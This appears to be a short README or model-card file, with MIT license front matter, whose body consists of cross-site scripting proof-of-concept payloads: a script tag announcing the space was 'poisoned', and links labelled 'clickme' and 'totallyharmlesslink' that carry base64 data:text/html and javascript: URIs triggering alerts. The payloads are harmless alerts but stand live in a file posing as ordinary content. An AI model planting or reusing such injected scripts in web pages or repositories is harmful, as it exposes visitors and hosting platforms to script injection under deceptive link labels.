File size: 386 Bytes
5dfd1ed 394b1ea |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
---
license: mit
---
<script>alert('This Space Was Poisoned By Thee Eclipse for XSS as a POC')</script>
[clickme]("data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pgo=")
[totallyharmlesslink]("javascript:window.onerror=alert;throw%201")
[clickme](data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pgo=)
[totallyharmlesslink](javascript:window.onerror=alert;throw%201)
|